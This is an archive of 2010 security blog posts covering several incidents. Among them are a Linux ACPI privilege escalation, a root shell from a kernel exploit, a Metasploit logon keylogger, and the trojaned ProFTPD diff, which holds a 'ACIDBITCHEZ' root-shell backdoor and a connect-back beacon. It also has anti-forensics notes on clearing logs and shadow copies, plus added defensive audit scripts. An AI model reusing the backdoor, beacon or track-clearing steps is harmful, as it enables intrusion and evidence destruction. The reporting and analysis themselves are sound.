Tuesday, December 21, 2010

Linux ACPI custom_method Privilege Escalation

On November 13th a fix was committed in the Linux kernel. For some reason I cannot understand, /sys/kernel/debug/acpi/custom_method was world writable, allowing any user to inject custom ACPI methods into the ACPI interpreter tables.

As the Red Hat bug report explains, it was introduced in this commit (Linux 2.6.33):

cm_dentry = debugfs_create_file("custom_method", S_IWUGO,
                                acpi_dir, NULL, &cm_fops);

S_IWUGO is a macro that grants world-writable permissions:

#define S_IWUGO         (S_IWUSR|S_IWGRP|S_IWOTH)

The fix changes the permissions to S_IWUSR, a macro that grants write access only to the owner (root).

An exploit already exists for this vulnerability.
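As an added example (not from the original post or the kernel), this Python script does the check an administrator would want after reading the above: it finds where debugfs is mounted by parsing /proc/mounts and walks that tree for files writable by others, which is the condition the S_IWUGO mode created. The demo function builds a throw-away directory imitating the buggy and the fixed file modes, since the real path needs root and a mounted debugfs.

```python
"""Audit a debugfs tree for world-writable entries such as the S_IWUGO
custom_method file, and list where debugfs is mounted according to
/proc/mounts.  Added example, not code from the post or the kernel."""
import os
import shutil
import stat
import tempfile

# Mode bits as defined in <linux/stat.h>; S_IWUGO is the mode the buggy commit used.
S_IWUSR, S_IWGRP, S_IWOTH = 0o200, 0o020, 0o002
S_IWUGO = S_IWUSR | S_IWGRP | S_IWOTH


def describe_write_bits(mode):
    """Return the classes of user that may write a file with this mode."""
    who = []
    if mode & S_IWUSR:
        who.append("owner")
    if mode & S_IWGRP:
        who.append("group")
    if mode & S_IWOTH:
        who.append("other")
    return who


def debugfs_mounts(proc_mounts_text):
    """Parse /proc/mounts text and return the mount points whose type is debugfs.

    Each line is: device mountpoint fstype options dump pass.
    """
    points = []
    for line in proc_mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[2] == "debugfs":
            points.append(fields[1])
    return points


def world_writable_files(root):
    """Walk root and return (path, octal mode) for every regular file whose
    "other" write bit is set, sorted by path."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & S_IWOTH:
                found.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(found)


def demo_constructed_tree():
    """Build a temporary directory imitating the bug and its fix (constructed
    data, not a real debugfs) and return the base names the audit flags."""
    root = tempfile.mkdtemp(prefix="debugfs-demo-")
    try:
        for name, mode in (("custom_method", S_IWUGO), ("custom_method_fixed", S_IWUSR)):
            path = os.path.join(root, name)
            open(path, "w").close()
            os.chmod(path, mode)
        return [os.path.basename(p) for p, _ in world_writable_files(root)]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    # Live use: needs root; nothing is reported if debugfs is not mounted.
    with open("/proc/mounts") as f:
        for mnt in debugfs_mounts(f.read()):
            for path, mode in world_writable_files(mnt):
                who = ", ".join(describe_write_bits(int(mode, 8)))
                print(f"{mode} {path} writable by {who}")
```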

Wednesday, December 15, 2010

The OpenBSD IPSec stack is possibly backdoored

Yesterday, Theo de Raadt sent an e-mail to the OpenBSD mailing list disclosing the possible existence of a backdoor in the IPsec stack.

I have received a mail regarding the early development of the OpenBSD IPSEC stack. It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack, in particular the IPSEC stack. Around 2000-2001.
Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations are.

The forwarded e-mail is unbelievable...

Hello Theo,
Long time no talk. If you will recall, a while back I was the CTO at NETSEC and arranged funding and donations for the OpenBSD Crypto Framework. At that same time I also did some consulting for the FBI, for their GSA Technical Support Center, which was a cryptologic reverse engineering project aimed at backdooring and implementing key escrow mechanisms for smart card and other hardware-based computing technologies.

My NDA with the FBI has recently expired, and I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI. Jason Wright and several other developers were responsible for those backdoors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, they more than likely caught wind of the fact that those backdoors were present and didn't want to create any derivative products based upon the same.
This is also why several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments, for example Scott Lowe is a well respected author in virtualization circles who also happens to be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMware vSphere deployments.
Merry Christmas...  

Gregory Perry  
Chief Executive Officer 
GoVirtual Education

Tuesday, December 14, 2010

Snort coverage for the Exim remote root vulnerability

The Sourcefire VRT has published a blog post that describes how Snort detects the Exim root vulnerability.

Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely.

No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the max_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).

Monitoring the network with sFlow

Some resources to monitor networks with sFlow. Seen in geek00l's blog.

sFlow is a technology comparable to NetFlow that can be used to monitor network activity in real time.

Capturing Windows Logon Credentials with Metasploit

Great blog post from the Metasploit blog that explains how to use a keylogger to capture the Windows Logon credentials.

Smartlocker is a script meant to capture the Windows credentials used to unlock the session.

- Migrates to winlogon.exe
- Waits for the session to be locked (the session is idle).
- Starts the keylogger until the session is unlocked (by typing the username and the password)
- Stops the keylogger
- The credentials are stored in a text file located in /home/{user}/.msf3/logs/scripts/smartlocker/

Monday, December 13, 2010

Root vulnerability in Exim

Several websites comment on the Exim root exploit that was published last week. In a nutshell, there is a memory corruption in the string_format() function that is triggered through the e-mail headers.

What worries me is:
The flaw has been remedied in the Exim sources since version 4.70, released at the end of 2008. The correction was not, however, marked as relevant for security and therefore was not included in older versions. Debian’s stable Lenny distribution still uses Exim 4.69, while Red Hat has 4.43.

Details from H-Security: Initial report and fixes

Exim's bug report

Kingcope's exploit

Wednesday, December 8, 2010

Linux Kernel <= 2.6.37 local privilege escalation

A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems
The Econet protocol (CVE-2010-3849) is not supported by default in Red Hat-like distributions (RHEL, CentOS and Fedora), and the major distributions have already patched CVE-2010-3849 and CVE-2010-3850, so up-to-date systems should not be affected by this particular exploit.

CVE-2010-4258 is the main vulnerability and it is still unpatched, so somebody could find another way to trigger it.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo
msk@ubuntu:~/exploit$ ./foo 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe08b72a0
 [+] Resolved econet_ops to 0xe08b73a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)

Friday, December 3, 2010

Beyond Exploits: Real World Penetration Testing

This is one of the presentations that should be watched by any IT Manager or Chief Security Officer.

People tend to focus their security posture on vulnerabilities instead of on a sound design that protects their critical assets, and even penetration testers make the same mistake. Bad penetration testers, of course.

In my career in IT, I have seen many so called penetration testers that just run vulnerability scanners and then send the report to the customer. It is plainly wrong (rubbish?) because I do not need to pay a company to scan my own network for vulnerabilities, since I can do it by myself, with the same results.

So, what is a penetration test? It is meant to emulate a real attack that tries to reach our core business by making use of any possible attack vector.

A penetration tester must try all the possible attack vectors. This includes: misconfigurations, bad network designs, vulnerabilities, social engineering, protocol weaknesses, etc. Simply because a skilled attacker, the motivated one who can cause real damage, will do the same.

H.D. Moore is the Chief Security Officer of Rapid7 and Founder & Chief Architect of Metasploit.

This presentation shows the techniques that can be used by a skilled penetration tester in order to gain full access to the network without exploiting a single vulnerability.

It includes: attacking the users, password testing, design weaknesses in the Windows platform (NTLM hashes and NTLM relay), exploiting SMB design weaknesses to gain privileges up to the domain controller, layer 2 attacks, IPv6, etc.

Slides  Video

Thursday, December 2, 2010

ftp.proftpd.org compromised

The ProFTPD project has sent out a report informing that its main distribution server was compromised.

On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.

UPDATE: I found a diff of the trojaned version:

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure       2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
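Review bot: the four lines added at the top of configure compile tests/tests.c with gcc (falling back to cc), start the result in the background and then delete both the source and the binary, all with output discarded, so an autoconf-generated script that should only probe the build environment now builds, runs and erases its own helper before doing anything else. Nothing in a configure script should compile and execute network code; this is the dropper for the beacon added as tests/tests.c in the last hunk, and any host on which ./configure from this tarball was run should be treated as having executed it. A quick check on an unpacked tarball is whether tests/tests.c exists at all: the last hunk diffs it against a 1970-dated, non-existent original, so the genuine 1.3.3c sources do not ship that file.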
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c      2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@

 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>

 struct help_rec {
   const char *cmd;
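Review bot: the two includes <stdlib.h> and <string.h> added after "conf.h" are not used by anything in this hunk; they exist only so that the setuid()/setgid()/system() and strcmp() calls inserted into the HELP handler in the next hunk compile, so this is not an independent header cleanup and must be reviewed together with that insertion.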
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");

     } else {
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
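Review bot: the single line inserted in the else branch, just before the "List the syntax for the given target command" comment, turns the HELP handler into a backdoor: when the HELP argument equals the literal "ACIDBITCHEZ" it calls setuid(0) and setgid(0) without checking their return values and then system("/bin/sh;/sbin/sh"), handing a root shell to any client on the control connection, authenticated or not, which is exactly the behaviour the advisory quoted above describes and the telnet session below demonstrates. The hunk header @@ -126,7 +128,7 @@ still claims a 7-line new side although one line was added and none removed, so this listing was hand-edited or is not raw diff output. On the defence side, a HELP command carrying that argument on the FTP control channel is a reliable network signature for attempts against this build.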
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c        2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+int sock;
+void handle_timeout(int sig)
+    close(sock);
+    exit(0);
+int main(void)
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+return 0; }
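Review bot: this is not a test but a connect-back beacon: main() resolves a hardcoded host (the address has been blanked to "" in this copy, so gethostbyname() fails and the program returns -1), connects to TCP port 9090, sends the fixed request "GET /AB HTTP/1.0" and exits, with alarm(DEF_TIMEOUT) making sure it can never stall the build that launched it from configure. Nothing under tests/ should open a socket to a fixed external host. Two smaller defects are visible as well: sprintf(ip, inet_ntoa(addr.sin_addr)) passes non-constant data as the format string, and *(unsigned long*)he->h_addr reads 8 bytes from a 4-byte IPv4 address on 64-bit systems. The listing is also incomplete as reproduced here: the header announces 58 added lines but 47 are shown, and the opening braces of handle_timeout() and main() are missing, so it would not compile as printed. For detection, an outbound connection to port 9090 made by a process named tests during a ProFTPD 1.3.3c build is the indicator to look for on build hosts.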

$ telnet 0 21
Connected to 0.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) []
214-The following commands are recognized (* =>'s unimplemented):
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
 NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
214 Direct comments to someone@somewhere
502 Unknown command 'ANOOP'
502 Unknown command 'A'

id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Using Volatility to perform memory forensics

The Volatility website points to a series of blog posts that explain how to use Volatility to perform memory forensics.

CSS History Hack

The CSS History Hack is an attack already explained by Jeremiah Grossman in 2006. In a nutshell, it is possible to use CSS and JavaScript to learn which pages our 'guest' has visited before. How? The web browser changes the style of the links the user has already visited.

Forbes explains that some popular sites like YouPorn are using this technique to know which other porn sites the user has visited before.

How does it work? It’s based on your browser changing the color of links you’ve already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color “purple,” meaning you’ve clicked them before. YouPorn did not respond to an inquiry about why it collects this information, and tries to hide the practice by disguising the script with some easy-to-break cryptography.*

The porn site is not alone in its desire to know what other websites visitors have visited. A group of researchers from the University of California – San Diego trolled through the Web’s most popular sites to see which ones were collecting this information about visitors. They found it on 46 other news, finance, sports, and games sites, reporting their findings in a paper with the intimidating title, “An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications.”

The researchers who wrote the paper identifying this practice call it “history hijacking” or “history sniffing.” Mozilla, the foundation behind Web browser Firefox, calls it the “CSS: visited history bug.” It’s a bug that’s been discussed in developer circles for over a decade. Some browsers have fixed the bug. If you’re surfing using Chrome or Safari, this script doesn’t work. Firefox has fixed it in its newest version (for a long explanation as to how, see this post on the Mozilla security blog.) Internet Explorer, the most popular browser out there, is vulnerable to the history sniffing (though you can prevent it by going through the slightly onerous step of activating InPrivate Browsing, according to a spokesperson. That feature also blocks ad networks’ cookies, reports Business Insider.)

Quick introduction to SamuraiWTF

holisticinfosec describes the purpose of SamuraiWTF.

SamuraiWTF is a LiveCD Linux release designed to serve you for your web pen-testing needs. Kevin Johnson of Secure Ideas and Justin Searle of InGuardians included what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. SamuraiWTF includes tools useful in all four steps of a web pen-test:
Reconnaissance – Fierce domain scanner, Maltego (be sure to check out the Shodan Maltego add-on)
Mapping – WebScarab, ratproxy
Discovery – w3af and burp
Exploitation – BeEF, AJAXShell

Russ McRee points to his article published in the December 2010 issue of the ISSA Journal. The article gives a quick introduction to the tools available in SamuraiWTF.

Thursday, November 25, 2010

Full packet capture on Cisco Firewall

Via opensourceforensics.org

Create and fire up the packet capture:
# capture MYCAP interface IFNAME packet-length 1500 buffer SIZE

The above command will capture everything; if you want to filter your capture, add an access list, like so:
# capture MYCAP interface IFNAME packet-length 1500 access-list 777 buffer SIZE

Remember to define access-list 777 first. Of course, you can substitute 777 with any other number.

Stop the capture:
# no capture MYCAP interface IFNAME

Retrieve the captured data:
Point your browser to the firewall SSL URL like so:
Download the pcap file, and open it with wireshark or a similar tool.
Note: you can also use tftp to get the pcap.

# no capture MYCAP

Two new privilege escalations in Windows

Two new privilege escalations in Windows have appeared this week.

Privilege escalation in the Scheduler
Via h-online.com
Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit, currently being circulated on the web, exploits the remaining hole in the Windows Task Planner to access protected system directories – even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.
According to webDEViL, who developed the exploit, the demo malware works under Windows 7, Vista and Server 2008, both in their 32-bit and in the 64-bit versions.

Privilege escalation in the Registry
Via isc.sans.edu, exploit-db.com and packetstormsecurity.org
Today proof of concept code (source code, with a compiled binary) of a 0-day privilege escalation vulnerability in almost all Windows operating system versions (Windows XP, Vista, 7, Server 2008 ...) has been posted on a popular programming web site.
The vulnerability is a buffer overflow in kernel (win32k.sys) and, due to its nature allows an attacker to bypass User Access Control (UAC) on Windows Vista and 7 operating systems.
What’s interesting is that the vulnerability exists in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key. Author of the PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges).
The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys. Since this is a critical area of the operating system (the kernel allows no mistakes), the published PoC only works on certain kernel versions while on others it can cause a nice BSOD. That being said, the code can be probably relatively easily modified to work on other kernel versions.

Tuesday, November 23, 2010

SSL MITM with sslstrip

Nice article that shows how to perform a MITM attack with sslstrip.

Open Source Digital Forensics

I have found the Open Source Digital Forensics website via the Internet Storm Center.

The Open Source Digital Forensics site is a reference on the use of open source software in digital investigations. As shown in the papers section, open source software may have legal benefits over closed source software.

  • An investigator can learn and testify about what her open source forensic analysis tools did.
  • An investigator can testify about the conditions that existed in the suspect's open source software for a piece of evidence to be generated (i.e. a log entry).

We do not claim that open source tools are superior to closed source tools. Both can have serious bugs and faults and produce errors. This site provides an easy reference for investigators who are interested in using open source analysis tools during an investigation.

The tools section is really interesting. It covers the following areas:

  • Use to boot a suspect system into a trusted state.
  • Use to collect data from a dead or live suspect system.
  • Use to examine the data structures that organize media, such as partition tables and disk labels.
  • Use to examine a file system or disk image and show the file content and other meta data.
  • Use to analyze the contents of a file (i.e. at the application layer).
  • Use to analyze network packets and traffic. This does not include logs from network devices.
  • Use to analyze memory dumps from computers.
  • Frameworks used to build custom tools.

Thursday, November 18, 2010

Doing penetration testing with a minimal footprint

This presentation from hack3rcon shows how to perform a penetration test that leaves a minimal footprint, thanks to the Metasploit Meterpreter.

It describes techniques to avoid leaving footprints in the Event Log, the Windows Registry, the Windows Prefetch and the File System.

Below you can read my notes (almost a copy of the slides).

Operating in the Shadows, by Carlos Perez a.k.a. Darkoperator, video from Adrian Crenshaw on Vimeo.

 - Runs in memory ( no disk access)
 - Memory scrubbing. Not easy to understand what meterpreter did when analyzing a memory image.
 - Windows API access
 - Encrypted traffic (man in the middle, self-generated keys)
 - Can be automated and extended

Why leave a minimal footprint?
- Test Incident Response
- Tests monitoring systems
- Real world attacks.

- list of targets and goals (business and technical point of views)
   * Interview the client and information gathering
- Enumerate target capabilities
- Physical, SE and network
- Design an initial plan
- Modify your plan as you keep advancing
  * Gather information from the hosts (data and configuration)
  * Modify your plan if something looks out of place

Know your enemy
- First go for the easy targets
  * They will check the processes running, connections, registry keys,
    event logs and they may dump the memory
- Not all companies have an IR team
- In some companies, the system administrators are also doing security.
- We can predict what the defenders are going to do

- Their questions:
  * Process list: time of creation, parent PID, owner and command line
  * Connections: Why is a process like 'notepad' connecting to Internet?
  * Why is Internet Explorer connecting to a not standard port?
  * etc.
- They will create a timeline to investigate the incident.

Event log
- Command and capabilities differ among Windows versions
  (they also do not record the same data and they use different formats)
- Event log: binary format up to Windows XP; XML format from Vista, 7 and 2008 on
- The IDs also changed with the new formats
- We can read from the registry without leaving footprints.
- We can get the file location, name and configuration out of the registry
- Script 'event_manager' works with the Eventlog from memory: query, clear, etc. It saves the data locally in a csv file.
- Windows 7 and Windows 2008 can send event logs to other servers by using winrm (ssl and self-generated certificates)
- A server can collect remote event logs if the Wecsvc service is running
- Wecsvc can be queried by using the wecutil command: es (enum subscriptions) and gs (enum configurations)
- Most interesting entries: Scheduled tasks, new/change/remove accounts, stop/start service, logon/logoff, failed logon, add/remove user from a group

Windows Registry
- OS settings
- Group policy settings
- Application settings
- Read access is available on most of it
- With the UAC enabled in Windows 7/2008R2, administrators may not be able to modify registry keys
- It can be configured to log access to it and the modifications (not set by default and rarely used)
- ACLs can be placed on registry keys (not set by default and rarely used)
- Metadata only shows Write and Creation Time, but not Access Time
- We need special tools to get the Write time: F-Response, EnCase and Open Source (http://www.forensicswiki.org/wiki/Windows_Registry)

Windows Prefetch
- Saves a list of the most commonly executed binaries to speed up the boot process. Enabled by default on client operating systems since XP.
- It shows how many times a file has been executed since it first appeared in the prefetch.
- %windir%\prefetch and can only be deleted by the administrator
- Configuration saved in the registry
- Anything we do on the computer will create a file there.

User Assist
- Registry key that saves a counter of the programs executed by Explorer.exe
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- Each key name is the name of the executable/shortcut encoded in ROT-13 (trivially decoded)
- Only the commands executed through the GUI

File System
- 2000,XP and 2003 record the last access time by default
- Vista, 7 and 2008 do not do that (performance)
- Cleaning a File MACE will not help since only $STDINFO is modified. The data will remain there.
- Deleted files and directories can be saved in a Volume Shadow (VSS or snapshots) that is enabled by default
- Some folders and file types are excluded from the snapshots and this information can be queried.

How To Operate
- Use Meterpreter commands
- Understand the scripts. Are they uploading/creating files or directories?
- check if prefetch and Volume Shadows are enabled
- Do not forget the User Assist key if the GUI is used

Know your Environment
- check your privileges
- What is running?
- What is being logged by EventLog?
- Is VSS enabled?
- What tools are they using?
- Is last Access Time logged?

Clear the Tracks
- Sometimes it is better to clear the security log even if it is a dead giveaway
- Delete the files and then wipe with cipher.exe
- Delete the Volume Shadows after wiping the files
- Delete prefetch entries in client computers

Execution of Commands
- Execute from Explorer
- Use Incognito or Tokens if you are System
- If you are placing tools, stream them under system executables and execute them from there
- Use Railgun instead of executables if possible (no write to disk is done because it is injecting DLLs)

Hide your Connections
- The connections must look 'normal'. Try to behave like a legitimate user/server would do.
- Use IPv6 when it is available because people are not looking at it.

Where to Take a Dump
- The files in the temporary folders have weird names.
- If not able to delete the VSS, check the file extensions and temporary folders.
- Be careful what you are writing to disk, because the antivirus will check the files (vbs, payloads)
- The duplicate and multi_meter_inject scripts can inject a meterpreter payload onto the memory of a running executable.

Wednesday, November 17, 2010

Tracking malware on a budget

Many people in IT will agree that budgets are getting smaller, if you are lucky enough to have some money at this time of the year ;) This post talks about finding infected computers in our networks without spending lots of money on expensive systems.

There is more and more research that provides lists of C&C servers, for the most common botnets.

As a quick summary:
- etc.

Making use of this information, we can set up an environment that permits us to quickly detect compromised computers in our network that try to reach the C&C servers, making the process of detection and clean-up faster.

A possible setup could be a DNS sinkhole plus some signatures in our IDS (all the traffic redirected by the DNS sinkhole is worth attention). This can be complemented with a dedicated web server that permits us to know the URLs that are being used to fetch the malware.

This point of view is interesting because it permits us to gather intelligence instead of just blocking the malware. This way, we have the opportunity to perform a malware analysis that will help us to understand how it behaves and, thus, provide a quick way to find/remove it from our computers.
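As an added example (not from the original post), this Python script implements the detection side of that setup: it reads DNS query log lines and the sinkhole web server's access log and reports, per internal host, the C&C domains it looked up and the URLs it tried to fetch. The log line format of the DNS server, the domain list and the 10.99.99.99 sinkhole address are all constructed for the example.

```python
"""Correlate DNS query logs with the sinkhole web server's access log to list
hosts that tried to reach known C&C domains.  Added example; the log formats,
domains and addresses below are constructed, not taken from any product."""
from collections import defaultdict
import re

# Constructed C&C domain list, standing in for the published research the post
# mentions.  The .invalid TLD guarantees these are not real indicators.
CC_DOMAINS = {"cnc1.example.invalid", "update.badbot.invalid"}
SINKHOLE_IP = "10.99.99.99"   # constructed: address every C&C name resolves to

# Constructed DNS query log: "<ts> client <ip> query <name> -> <answer>"
DNS_LOG = """\
2010-11-17T09:01:02 client 10.0.5.21 query www.example.org -> 192.0.2.10
2010-11-17T09:01:09 client 10.0.5.21 query cnc1.example.invalid -> 10.99.99.99
2010-11-17T09:02:15 client 10.0.7.44 query update.badbot.invalid -> 10.99.99.99
2010-11-17T09:02:40 client 10.0.5.21 query cnc1.example.invalid -> 10.99.99.99
"""

# Constructed access log of the sinkhole web server (Common Log Format).
WEB_LOG = """\
10.0.5.21 - - [17/Nov/2010:09:01:10 +0000] "GET /gate.php?id=7 HTTP/1.1" 200 12
10.0.7.44 - - [17/Nov/2010:09:02:16 +0000] "GET /bin/update.exe HTTP/1.1" 200 98304
"""

DNS_RE = re.compile(r"^(\S+) client (\S+) query (\S+) -> (\S+)$")
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def sinkholed_lookups(dns_log, cc_domains, sinkhole_ip):
    """Return {client_ip: {domain: count}} for queries that named a C&C domain
    or were answered with the sinkhole address (the answer check also catches
    names the sinkhole already redirects but our list does not yet contain)."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in dns_log.splitlines():
        m = DNS_RE.match(line)
        if not m:
            continue
        _ts, client, name, answer = m.groups()
        name = name.lower().rstrip(".")
        if name in cc_domains or answer == sinkhole_ip:
            hits[client][name] += 1
    return {c: dict(d) for c, d in hits.items()}


def fetched_urls(web_log):
    """Return {client_ip: [request path, ...]} from the sinkhole web server.
    Every request that reaches this server is a redirected malware fetch or
    beacon, so all of them are kept."""
    urls = defaultdict(list)
    for line in web_log.splitlines():
        m = CLF_RE.match(line)
        if m:
            client, _ts, _method, path, _status = m.groups()
            urls[client].append(path)
    return dict(urls)


def compromised_hosts(dns_log, web_log, cc_domains, sinkhole_ip):
    """Join both sources into one record per internal host, with the domains it
    looked up and the URLs it tried to fetch, most active host first."""
    lookups = sinkholed_lookups(dns_log, cc_domains, sinkhole_ip)
    urls = fetched_urls(web_log)
    report = [{"host": h, "domains": lookups.get(h, {}), "urls": urls.get(h, [])}
              for h in set(lookups) | set(urls)]
    report.sort(key=lambda r: (-sum(r["domains"].values()), r["host"]))
    return report


if __name__ == "__main__":
    for rec in compromised_hosts(DNS_LOG, WEB_LOG, CC_DOMAINS, SINKHOLE_IP):
        print(rec["host"], rec["domains"], rec["urls"])
```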

Saturday, November 13, 2010

Quick introduction to Network Security Monitoring

Network Security Monitoring is the area of Information Security I love, Unix systems aside, and I have wanted to write about this methodology since I started this blog :)

Many of the concepts I am going to talk about are better explained in the awesome book by Richard Bejtlich entitled The Tao of Network Security Monitoring: Beyond Intrusion Detection. You can find more information about his book on his website.

The idea behind NSM is that Network Monitoring is not just a matter of deploying an IDS or IPS in the network. When an alert is generated, the only information we have is a rule and a small packet capture with the bytes that generated the alert.

The questions here are: Do we have enough information to confirm whether this was an attack or not? Was it successful? Can we easily track the activities performed by the attacker in our network? The short answer is: we do not know! We do not have enough details to perform an investigation.

NSM is a methodology that tries to solve this problem by offering the data that an analyst needs to perform the investigation. I will not explain all the details, because it is too long for a blog post, but I will try to briefly explain the main concepts.

Full content data

It is easy to understand that, in an ideal scenario, a full packet capture of the traffic generated by the attacker should be enough, because it contains all the details of the activities performed by the attacker in our network.

With this data, we can confirm if an attack was successful and if the attacker went deeper into our network. Furthermore, we can obtain the tool-kits that were downloaded to the compromised server. The attacker can try to fool a forensic analyst who is analysing the compromised computer, but that is not possible with network communications.

Session data
Unfortunately, full content data does not scale. An analyst cannot easily perform an investigation with huge amounts of data, and it is even worse when the task is in real time. Session data helps to solve this problem because it is just a summary of the traffic that passed through our sensors.

An analyst can quickly track the attacker by applying filters to the session data and then going to the full content data when it is needed. At this point, the available data consists of all the communications at the transport layer, without the content of the packets. This includes: IP addresses, protocols, ports, flags, etc.
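As an added example (not the book's or the post's code), this Python snippet builds session records from packet metadata the way just described, applies the kind of filter an analyst would (every session involving one external address), and pivots from the matching session back to its full content packets. All packets are constructed; 203.0.113.7 plays the external attacker.

```python
"""Summarise constructed packets into session data, filter it by a suspect
address, then pull the full content packets of the matching session.
Added example; the packets and addresses below are made up."""
from collections import namedtuple

# One record per packet, as a full content sensor would hand them over.
Packet = namedtuple("Packet", "ts src sport dst dport proto flags payload")

PACKETS = [
    Packet(100.0, "203.0.113.7", 40211, "10.0.0.5", 22, "tcp", "S", b""),
    Packet(100.1, "10.0.0.5", 22, "203.0.113.7", 40211, "tcp", "SA", b""),
    Packet(100.1, "203.0.113.7", 40211, "10.0.0.5", 22, "tcp", "A", b""),
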